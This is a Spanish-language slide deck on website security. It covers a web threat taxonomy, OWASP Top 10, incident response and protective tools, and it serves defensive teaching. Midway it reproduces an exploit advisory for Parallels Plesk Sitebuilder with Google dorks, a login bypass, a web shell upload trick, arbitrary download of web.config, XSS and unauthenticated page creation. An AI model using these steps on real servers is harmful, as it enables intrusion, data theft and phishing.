SlideShare una empresa de Scribd logo
1 de 87
¿Puede mi sitio web sufrir un ataque? ¿Qué puedo hacer?
¿Puede mi sitio web sufrir un ataque?
La respuesta es obvia:
¿Qué puedo hacer?
Introducción a los ataques existentes
Clasificación de amenazas WEB
Abuso de la funcionalidad: el abuso de funcionalidad es una técnica
de ataque que utiliza las propias características y funciones de un
sitio web para consumir, defraudar o eludir los mecanismos de
control de acceso.
Fuerza bruta: una ataque de fuerza bruta es un proceso
automatizado de prueba y error que se utiliza para adivinar el
nombre de usuario, la contraseña, el número de tarjeta de crédito o
la clave criptográfica de una persona.
Desbordamiento de almacenamiento intermedio: los exploits de
desbordamiento de almacenamiento intermedio son ataques que
alteran el flujo de una aplicación sobrescribiendo partes de la
memoria.
Usurpación de contenido: la usurpación de contenido es una
técnica de ataque que se utiliza para hacer creer a un usuario que
determinado contenido que aparece en un sitio web es legítimo y
no procede de un origen externo.
Introducción a los ataques existentes
Clasificación de amenazas WEB
Predicción de sesión/credenciales: la predicción de
sesión/credenciales es un método de apropiación de identidad o
suplantación de un usuario de sitio web. Deducir o adivinar el valor
único que identifica la sesión o el usuario concreto que efectúa el
ataque.
Script entre sitios: el script entre sitios (XSS) es una técnica de
ataque que obliga a un sitio web a duplicar el código ejecutable
proporcionado por el atacante, que se carga en el navegador de un
usuario. Un usuario de un script entre sitios puede verse expropiado
de su cuenta (robo de cookies), su navegador puede ser redirigido a
otra ubicación, o se le puede mostrar contenido fraudulento en el
sitio web que esté visitando.
Denegación de servicio: la denegación de servicio (DoS) es una
técnica de ataque cuyo objetivo es impedir que un sitio web ofrezca
una actividad normal a los usuarios.
Introducción a los ataques existentes
Clasificación de amenazas WEB
Indexación de directorios: el listado/indexación automática de
directorios es una función de servidor que lista todos los archivos en
un directorio solicitado si el archivo básico normal
(index.html/home.html/default.htm) no está presente.
Ataque de serie de formato: los ataques de serie de formato
alteran el flujo de una aplicación utilizando características de la
biblioteca de formatos de series para acceder a otro espacio de la
memoria.
Filtrado de información: el filtraje de información se produce
cuando un sitio web revela datos confidenciales, por ejemplo
comentarios de un desarrollador o mensajes de error, que pueden
ayudar a un atacante a aprovecharse del sistema.
Anti automatización insuficiente: la anti automatización
insuficiente se produce cuando un sitio web permite a un atacante
automatizar un proceso que sólo debe realizarse manualmente.
Introducción a los ataques existentes
Clasificación de amenazas WEB
Autenticación insuficiente: la autenticación insuficiente se produce
cuando un sitio web permite a un atacante acceder a contenido o
funciones confidenciales sin autenticar correctamente sus permisos
de acceso.
Autorización insuficiente: la autorización insuficiente se produce
cuando un sitio web permite el acceso a contenido o funciones
confidenciales que deben requerir un incremento de las
restricciones de control de acceso.
Validación de proceso insuficiente: la validación de proceso
insuficiente se produce cuando un sitio web permite a un atacante
eludir el control de flujo previsto de una aplicación.
Caducidad de sesión insuficiente: la caducidad de sesión
insuficiente se produce cuando un sitio web permite a un atacante
reutilizar credenciales de sesión o ID de sesión antiguos para llevar a
cabo la autorización. La caducidad de sesión insuficiente aumenta la
exposición de un sitio web a los ataques que roban o suplantan a
otros usuarios.
Introducción a los ataques existentes
Clasificación de amenazas WEB
Inyección LDAP: la inyección LDAP es una técnica de ataque
utilizada para aprovecharse de los sitios web que crean sentencias
LDAP (Lightweight Directory Access Protocol) a partir de entradas
proporcionadas por los usuarios.
Envío de mandatos del SO: el envío de mandatos del SO es una
técnica de ataque utilizada para aprovecharse de los sitios web
mediante la ejecución de mandatos del sistema operativo a través
de la manipulación de la entrada de la aplicación.
Cruce de vía de acceso: la técnica de ataque de cruce de vía de
acceso fuerza el acceso a archivos, directorios y mandatos que
pueden estar ubicados potencialmente fuera del directorio raíz de
documentos. Un atacante podría manipular un URL de forma que el
sitio web ejecutará o revelará el contenido de archivos arbitrarios
en cualquier parte del servidor web.
Introducción a los ataques existentes
Clasificación de amenazas WEB
Ubicación de recursos predecible: la ubicación de recursos
predecible es una técnica de ataque utilizada para descubrir
contenido y funciones ocultas de un sitio web. El ataque, que se vale
de considerar la información de la que dispone, es una búsqueda de
fuerza bruta en busca de contenido que no está pensado para
mostrarse públicamente. Archivos temporales, archivos de copia de
seguridad, archivos de configuración y archivos de ejemplo son
todos ejemplos de archivos potencialmente sobrantes.
Fijación de sesión: la fijación de sesión es una técnica de ataque que
fuerza un ID de sesión de usuario a un valor explícito.
Inyección SQL: la inyección SQL es una técnica de ataque utilizada
para aprovecharse de los sitios web que crean sentencias SQL a
partir de entradas proporcionadas por los usuarios.
Inyección SSI: la inyección SSI (inclusión del lado del servidor) es una
técnica de aprovechamiento del lado del servidor que permite a un
atacante enviar código en una aplicación, que posteriormente el
servidor web ejecutará localmente.
Introducción a los ataques existentes
Clasificación de amenazas WEB
Validación de recuperación de contraseña débil: la validación de
recuperación de contraseña débil se produce cuando un sitio web
permite a un atacante obtener, cambiar o recuperar ilegalmente la
contraseña de otro usuario.
Inyección XPath: la inyección XPath es una técnica de ataque
utilizada para aprovecharse de los sitios web que crean consultas
XPath a partir de entradas proporcionadas por los usuarios.
Introducción a los ataques existentes
=¿$?
Consecuencias derivadas de los ataques
Introducción a los ataques existentes
Panorama…
Introducción a los ataques existentes
Panorama…
Crouching Yeti / Energetic Bear (Verano 2014)
Introducción a los ataques existentes
Panorama…
Introducción a los ataques existentes
Introducción a los ataques existentes
Introducción a los ataques existentes
http://www.ddossite.com/
http://youtu.be/vn-lU3Zu3dw
http://youtu.be/aCacibJa0Ps
Introducción a los ataques existentes
http://www.digitalattackmap.com
Introducción a los ataques existentes
Introducción a los ataques existentes
Introducción a los ataques existentes
Introducción a los ataques existentes
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder
# Author : alieye
# vendor : http://www.parallels.com/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
#
# Google Dork:
# inurl::2006/Sites ext:aspx
# inurl::2006 inurl:.ashx?mediaid
# intext:"© Copyright 2004-2007 SWsoft." ext:aspx
# inurl:Wizard/HostingPreview.aspx?SiteID
#
# Date: 23/07/2014
# os : windows server 2003
# poc video clip : http://alieye.persiangig.com/video/plesk.rar/download
#
# version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010
# version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1-bypass loginpage (all version)
http://victim.com:2006/login.aspx
change url path to http://victim.com:2006/wizard
2-uploading shell via Live HTTP Headers(Copyright 2004-2010)
Tools Needed: Live HTTP Headers, Backdoor Shell
Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx
Step 2: Rename your shell to shell.asp.gif and start capturing data with
Live HTTP Headers
Step 3: Replay data with Live HTTP Headers -
Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"rn] to [Content-Disposition: form-data;
name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"rn]
Step 5: go to shell path:
http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp
3-Arbitrary File Download Vulnerability(all version)
You can download any file from your target
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename
example:
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config
4-xss(all version)
you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx
goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :)
5-not authentication for making a website(all version)
making malicious page and phishing page with these paths
http://victim.com:2006/Wizard/Pages.aspx
http://victim.com:2006/Wizard/Edit.aspx
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir
[#] Thanks To All cseye members and All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To Master of Persian Music: Hossein Alizadeh
[#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/
[#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Introducción a los ataques existentes
Introducción a los ataques existentes
Introducción a los ataques existentes
El objetivo principal del TOP 10 OWASP es dar a conocer a los desarrolladores,
diseñadores, arquitectos, gerentes, y organizaciones sobre las consecuencias
de las vulnerabilidades de seguridad más importantes en aplicaciones web.
El TOP 10 provee de técnicas básicas sobre como protegerse en estas áreas de
alto riesgo y también provee orientación sobre los pasos a seguir.
Que se hable de top 10 no significa que no existan más vulnerabilidades!!
Simplemente son las más comunes.
http://youtu.be/dGLM_xjZZms
Para muestra… un botón:
http://youtu.be/UtU1gGv9xNw
Evolución OWASP Top 10
Consecuencias. Ejemplos prácticos
Consecuencias. Ejemplos prácticos
Consecuencias. Ejemplos prácticos
Consecuencias. Ejemplos prácticos
He sido atacado. ¿Ahora que
hago?
El procedimiento varía dependiendo de múltiples variables pero podría ser algo
así:
1.- Poner el sitio web atacado offline.
2.- Guardar logs, hacer backup de la base de datos y de los archivos. Aplicar
FUEGO PURIFICADOR o contratar servicios de desinfección.
3.- Revisar todas las posibles extensiones vulnerables o framework e intentar
determinar el punto de entrada.
4.- Reinstalar framework, plugins, plantillas, bbdd, SO, … desde un backup que se
sepa que está limpio. Parchear el posible punto de entrada.
5.-Cambiar todas las contraseñas
6.- Si se ha sido intermediario de un ataque de watering hole o se cree que se
han podido ver comprometidos datos de importancia, notificar a posibles
usuarios afectados el incidente de seguridad.
He sido atacado. ¿Ahora que
hago?
Denunciar si hemos sido victimas de un ataque
Contratar servicios especializados de análisis forense para que en caso
de que se quiera llevar a juicio el ataque, se disponga de pruebas válidas
con las que afrontar la denuncia.
WAF. Web Application Firewall
Herramientas y servicios con los que
protegernos
Nos protege de:
>Vulnerabilidades de sistema operativo
>Vulnerabilidades de aplicación
SQLi
XSS
LFI
RFI
DT
…
Nos tiene que quedar claro que las aplicaciones y sistemas
operativos siguen siendo vulnerables. Parcheo Virtual
WAF. Web Application Firewall
Herramientas y servicios con los que
protegernos
De todos los colores y sabores:
>Software (Open Source, Propietarios…)
>Virtuales
>Hardware
>As a Service (En la nube)
Herramientas y servicios con los que
protegernos
WAF. Web Application Firewall
Herramientas y servicios con los que
protegernos
Sistemas Anti DDoS
Herramientas y servicios con los que
protegernos
Servicios de monitorización de contenidos WEB+ Desinfección +IR
Herramientas y servicios con los que
protegernos
Servicios de monitorización de contenidos WEB+ Desinfección +IR
Herramientas y servicios con los que
protegernos
Autenticación multifactor / Protección de identidades digitales
Herramientas y servicios con los que
protegernos
Hostings/Housings especializados
Herramientas y servicios con los que
protegernos
Herramientas de hardening de frameworks especificos, buenas
prácticas,…
Guía básica seguridad Wordpress Inteco
http://www.inteco.es/file/WbpsPPREE7nfCgs9ZBYoAQ
Guía básica seguridad Joomla Inteco
http://www.inteco.es/file/WbpsPPREE7naXKiMJlkT_g
Herramientas y servicios con los que
protegernos
http://punkspider.hyperiongray.com
Herramientas y servicios con los que
protegernos
http://sitecheck.sucuri.net/
Herramientas y servicios con los que
protegernos
http://zulu.zscaler.com/
Herramientas y servicios con los que
protegernos
Herramientas y servicios con los que
protegernos
Algunos consejos útiles
 Contar con profesionales del desarrollo web SEGURO
 Cuando se contrate el servicio de presencia web hablar de que ocurre en caso
de que surjan vulnerabilidades, se sea victima de un ataque, tiempos de parcheo,
Plan de contingencia…)
 Antes de poner una web online comprobar su seguridad (Revisión código,
Auditoría WEB)
 Realizar asiduamente backups tanto de la base de datos como de la aplicación
y sus ficheros asociados.
Preparar un Plan de Recuperación ante incidentes. Entrenarse, ponerlo a
prueba.
 No utilizar la misma contraseña para todas las cuentas
 Cifrar la documentación/datos online importantes
 Cambia de contraseñas cada cierto tiempo
 Usuarios y contraseñas personales e intransferibles
 Tener especial cuidado cuando se manejan datos sensibles (LOPD)
Algunos consejos útiles
Utilizar mecanismos de autenticación de múltiples factore.
 Llevar un control sobre los CMS instalados y los diferentes plugins
(seguros)instalados
 Actualizar y parchear tanto sistemas como aplicaciones
 Integración de sistemas Captchas para evitar herramientas automatizadas.
 Contratar hostings, housings con servicios de seguridad adicionales (WAF,
ADDoS)
Algunos consejos útiles
Algunos consejos útiles
Algunos consejos útiles
Algunos consejos útiles
Algunos consejos útiles
Algunos consejos útiles

Más contenido relacionado

Similar a Seguridad en la web

Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securityseguridadelinux
 
Seguridad en aplicaciones web
Seguridad en aplicaciones webSeguridad en aplicaciones web
Seguridad en aplicaciones webJose Mato
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebAlonso Caballero
 
Seguridad web
Seguridad webSeguridad web
Seguridad webcamposer
 
Webinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosWebinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosAlonso Caballero
 
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologías
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologíasUNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologías
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologíasUNEG-AS
 
01 - Sesión 09 - Fallos de Seguridad.pptx
01 - Sesión 09 - Fallos de Seguridad.pptx01 - Sesión 09 - Fallos de Seguridad.pptx
01 - Sesión 09 - Fallos de Seguridad.pptxssusercb51cd
 
Vulnerabilidades del Software
Vulnerabilidades del SoftwareVulnerabilidades del Software
Vulnerabilidades del Softwarelechosopowers
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Andrés Gómez
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridadkiensoiyo
 
Hacking de servidores web OMHE
Hacking de servidores web OMHEHacking de servidores web OMHE
Hacking de servidores web OMHEHéctor López
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de SeguridadJaime Leon
 
Seguridad en servidores
Seguridad en servidoresSeguridad en servidores
Seguridad en servidoresTaty Millan
 
Client side attacks in web applications
Client side attacks in web applicationsClient side attacks in web applications
Client side attacks in web applicationsEventos Creativos
 

Similar a Seguridad en la web (20)

Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_security
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
 
Seguridad en aplicaciones web
Seguridad en aplicaciones webSeguridad en aplicaciones web
Seguridad en aplicaciones web
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones Web
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
 
Webinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosWebinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de Comandos
 
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologías
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologíasUNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologías
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologías
 
01 - Sesión 09 - Fallos de Seguridad.pptx
01 - Sesión 09 - Fallos de Seguridad.pptx01 - Sesión 09 - Fallos de Seguridad.pptx
01 - Sesión 09 - Fallos de Seguridad.pptx
 
Vulnerabilidades del Software
Vulnerabilidades del SoftwareVulnerabilidades del Software
Vulnerabilidades del Software
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridad
 
Temas owasp
Temas owaspTemas owasp
Temas owasp
 
Seguridad en los sistemas web
Seguridad en los sistemas webSeguridad en los sistemas web
Seguridad en los sistemas web
 
Hacking de servidores web OMHE
Hacking de servidores web OMHEHacking de servidores web OMHE
Hacking de servidores web OMHE
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridad
 
Owasp proyecto
Owasp proyectoOwasp proyecto
Owasp proyecto
 
Seguridad en servidores
Seguridad en servidoresSeguridad en servidores
Seguridad en servidores
 
ciberataques
ciberataquesciberataques
ciberataques
 
Client side attacks in web applications
Client side attacks in web applicationsClient side attacks in web applications
Client side attacks in web applications
 
Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)
 

Más de Tensor

Libertad
LibertadLibertad
LibertadTensor
 
Método de la regla falsa (o metodo de la falsa posición)
Método de la regla falsa (o metodo de la falsa posición)Método de la regla falsa (o metodo de la falsa posición)
Método de la regla falsa (o metodo de la falsa posición)Tensor
 
Metodo de la bisección
Metodo de la bisecciónMetodo de la bisección
Metodo de la bisecciónTensor
 
Transito vehicular
Transito vehicularTransito vehicular
Transito vehicularTensor
 
Teoria de colas
Teoria de colasTeoria de colas
Teoria de colasTensor
 
Practica 7 2016
Practica 7 2016Practica 7 2016
Practica 7 2016Tensor
 
Practica 6 2016
Practica 6 2016Practica 6 2016
Practica 6 2016Tensor
 
Game maker
Game makerGame maker
Game makerTensor
 
Practica 5 2016
Practica 5 2016Practica 5 2016
Practica 5 2016Tensor
 
Procesamiento de archivos
Procesamiento de archivosProcesamiento de archivos
Procesamiento de archivosTensor
 
Cadenas y funciones de cadena
Cadenas y funciones de cadenaCadenas y funciones de cadena
Cadenas y funciones de cadenaTensor
 
Simulación en promodel clase 04
Simulación en promodel clase 04Simulación en promodel clase 04
Simulación en promodel clase 04Tensor
 
Reduccion de orden
Reduccion de ordenReduccion de orden
Reduccion de ordenTensor
 
Variación+de+parametros
Variación+de+parametrosVariación+de+parametros
Variación+de+parametrosTensor
 
Coeficientes indeterminados enfoque de superposición
Coeficientes indeterminados   enfoque de superposiciónCoeficientes indeterminados   enfoque de superposición
Coeficientes indeterminados enfoque de superposiciónTensor
 
Bernoulli y ricatti
Bernoulli y ricattiBernoulli y ricatti
Bernoulli y ricattiTensor
 
Practica no. 3 tiempo de servicio
Practica no. 3 tiempo de servicioPractica no. 3 tiempo de servicio
Practica no. 3 tiempo de servicioTensor
 
Clase 14 ondas reflejadas
Clase 14 ondas reflejadasClase 14 ondas reflejadas
Clase 14 ondas reflejadasTensor
 
Ondas em
Ondas emOndas em
Ondas emTensor
 
Clase 7 ondas electromagneticas
Clase 7 ondas electromagneticasClase 7 ondas electromagneticas
Clase 7 ondas electromagneticasTensor
 

Más de Tensor (20)

Libertad
LibertadLibertad
Libertad
 
Método de la regla falsa (o metodo de la falsa posición)
Método de la regla falsa (o metodo de la falsa posición)Método de la regla falsa (o metodo de la falsa posición)
Método de la regla falsa (o metodo de la falsa posición)
 
Metodo de la bisección
Metodo de la bisecciónMetodo de la bisección
Metodo de la bisección
 
Transito vehicular
Transito vehicularTransito vehicular
Transito vehicular
 
Teoria de colas
Teoria de colasTeoria de colas
Teoria de colas
 
Practica 7 2016
Practica 7 2016Practica 7 2016
Practica 7 2016
 
Practica 6 2016
Practica 6 2016Practica 6 2016
Practica 6 2016
 
Game maker
Game makerGame maker
Game maker
 
Practica 5 2016
Practica 5 2016Practica 5 2016
Practica 5 2016
 
Procesamiento de archivos
Procesamiento de archivosProcesamiento de archivos
Procesamiento de archivos
 
Cadenas y funciones de cadena
Cadenas y funciones de cadenaCadenas y funciones de cadena
Cadenas y funciones de cadena
 
Simulación en promodel clase 04
Simulación en promodel clase 04Simulación en promodel clase 04
Simulación en promodel clase 04
 
Reduccion de orden
Reduccion de ordenReduccion de orden
Reduccion de orden
 
Variación+de+parametros
Variación+de+parametrosVariación+de+parametros
Variación+de+parametros
 
Coeficientes indeterminados enfoque de superposición
Coeficientes indeterminados   enfoque de superposiciónCoeficientes indeterminados   enfoque de superposición
Coeficientes indeterminados enfoque de superposición
 
Bernoulli y ricatti
Bernoulli y ricattiBernoulli y ricatti
Bernoulli y ricatti
 
Practica no. 3 tiempo de servicio
Practica no. 3 tiempo de servicioPractica no. 3 tiempo de servicio
Practica no. 3 tiempo de servicio
 
Clase 14 ondas reflejadas
Clase 14 ondas reflejadasClase 14 ondas reflejadas
Clase 14 ondas reflejadas
 
Ondas em
Ondas emOndas em
Ondas em
 
Clase 7 ondas electromagneticas
Clase 7 ondas electromagneticasClase 7 ondas electromagneticas
Clase 7 ondas electromagneticas
 

Último

Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdfFichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdfssuser50d1252
 
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOTUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOweislaco
 
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsxJuanpm27
 
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfFichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfssuser50d1252
 
describimos como son afectados las regiones naturales del peru por la ola de ...
describimos como son afectados las regiones naturales del peru por la ola de ...describimos como son afectados las regiones naturales del peru por la ola de ...
describimos como son afectados las regiones naturales del peru por la ola de ...DavidBautistaFlores1
 
05 Fenomenos fisicos y quimicos de la materia.pdf
05 Fenomenos fisicos y quimicos de la materia.pdf05 Fenomenos fisicos y quimicos de la materia.pdf
05 Fenomenos fisicos y quimicos de la materia.pdfRAMON EUSTAQUIO CARO BAYONA
 
Presentación Bloque 3 Actividad 2 transversal.pptx
Presentación Bloque 3 Actividad 2 transversal.pptxPresentación Bloque 3 Actividad 2 transversal.pptx
Presentación Bloque 3 Actividad 2 transversal.pptxRosabel UA
 
Secuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docxSecuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docxNataliaGonzalez619348
 
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...fcastellanos3
 
Técnicas de grabado y estampación : procesos y materiales
Técnicas de grabado y estampación : procesos y materialesTécnicas de grabado y estampación : procesos y materiales
Técnicas de grabado y estampación : procesos y materialesRaquel Martín Contreras
 
SIMULACROS Y SIMULACIONES DE SISMO 2024.docx
SIMULACROS Y SIMULACIONES DE SISMO 2024.docxSIMULACROS Y SIMULACIONES DE SISMO 2024.docx
SIMULACROS Y SIMULACIONES DE SISMO 2024.docxLudy Ventocilla Napanga
 
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docxEDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docxLuisAndersonPachasto
 
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxMartín Ramírez
 
Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...Angélica Soledad Vega Ramírez
 
Fichas de Matemática TERCERO DE SECUNDARIA.pdf
Fichas de Matemática TERCERO DE SECUNDARIA.pdfFichas de Matemática TERCERO DE SECUNDARIA.pdf
Fichas de Matemática TERCERO DE SECUNDARIA.pdfssuser50d1252
 
sesión de aprendizaje 4 E1 Exposición oral.pdf
sesión de aprendizaje 4 E1 Exposición oral.pdfsesión de aprendizaje 4 E1 Exposición oral.pdf
sesión de aprendizaje 4 E1 Exposición oral.pdfpatriciavsquezbecerr
 
Concurso José María Arguedas nacional.pptx
Concurso José María Arguedas nacional.pptxConcurso José María Arguedas nacional.pptx
Concurso José María Arguedas nacional.pptxkeithgiancarloroquef
 
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADOPLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADOMARIBEL DIAZ
 
libro para colorear de Peppa pig, ideal para educación inicial
libro para colorear de Peppa pig, ideal para educación iniciallibro para colorear de Peppa pig, ideal para educación inicial
libro para colorear de Peppa pig, ideal para educación inicialLorenaSanchez350426
 
Presentacion minimalista aesthetic simple beige_20240415_224856_0000.pdf
Presentacion minimalista aesthetic simple beige_20240415_224856_0000.pdfPresentacion minimalista aesthetic simple beige_20240415_224856_0000.pdf
Presentacion minimalista aesthetic simple beige_20240415_224856_0000.pdfSarayLuciaSnchezFigu
 

Último (20)

Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdfFichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
 
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOTUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
 
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
 
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfFichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
 
describimos como son afectados las regiones naturales del peru por la ola de ...
describimos como son afectados las regiones naturales del peru por la ola de ...describimos como son afectados las regiones naturales del peru por la ola de ...
describimos como son afectados las regiones naturales del peru por la ola de ...
 
05 Fenomenos fisicos y quimicos de la materia.pdf
05 Fenomenos fisicos y quimicos de la materia.pdf05 Fenomenos fisicos y quimicos de la materia.pdf
05 Fenomenos fisicos y quimicos de la materia.pdf
 
Presentación Bloque 3 Actividad 2 transversal.pptx
Presentación Bloque 3 Actividad 2 transversal.pptxPresentación Bloque 3 Actividad 2 transversal.pptx
Presentación Bloque 3 Actividad 2 transversal.pptx
 
Secuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docxSecuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docx
 
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
 
Técnicas de grabado y estampación : procesos y materiales
Técnicas de grabado y estampación : procesos y materialesTécnicas de grabado y estampación : procesos y materiales
Técnicas de grabado y estampación : procesos y materiales
 
SIMULACROS Y SIMULACIONES DE SISMO 2024.docx
SIMULACROS Y SIMULACIONES DE SISMO 2024.docxSIMULACROS Y SIMULACIONES DE SISMO 2024.docx
SIMULACROS Y SIMULACIONES DE SISMO 2024.docx
 
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docxEDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docx
 
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
 
Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...
 
Fichas de Matemática TERCERO DE SECUNDARIA.pdf
